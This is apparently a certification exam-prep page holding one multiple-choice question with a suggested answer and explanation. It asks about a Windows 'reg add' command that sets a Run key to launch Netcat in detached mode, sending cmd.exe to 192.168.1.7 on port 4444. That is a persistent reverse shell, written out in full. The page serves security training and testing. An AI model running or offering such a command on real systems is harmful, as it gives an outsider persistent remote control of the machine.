ExamGecko
Question list
Search
Search

List of questions

Search

Related questions











Question 147 - 312-38 discussion

Report
Export

You run the following command on the remote Windows server 2003 computer: c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"

What task do you want to perform by running this command? Each correct answer represents a complete solution. Choose all that apply.

A.
You want to perform banner grabbing.
Answers
A.
You want to perform banner grabbing.
B.
You want to put Netcat in the stealth mode.
Answers
B.
You want to put Netcat in the stealth mode.
C.
You want to add the Netcat command to the Windows registry.
Answers
C.
You want to add the Netcat command to the Windows registry.
D.
You want to set the Netcat to execute command any time.
Answers
D.
You want to set the Netcat to execute command any time.
Suggested answer: B, C, D

Explanation:

According to the question, you run the following command on the remote Windows server 2003 computer:

c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe" By running this command, you want to perform the following tasks:

Adding the NetCat command in the following registry value: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Putting the Netcat in the stealth mode by using the -d switch. Setting the Netcat tool to execute command at any time by using the -e switch. Answer option A is incorrect. You can perform banner grabbing by simply running the nc <host> <port>.

asked 18/09/2024
Giuseppina Mancinelli
34 questions
User
Your answer:
0 comments
Sorted by

Leave a comment first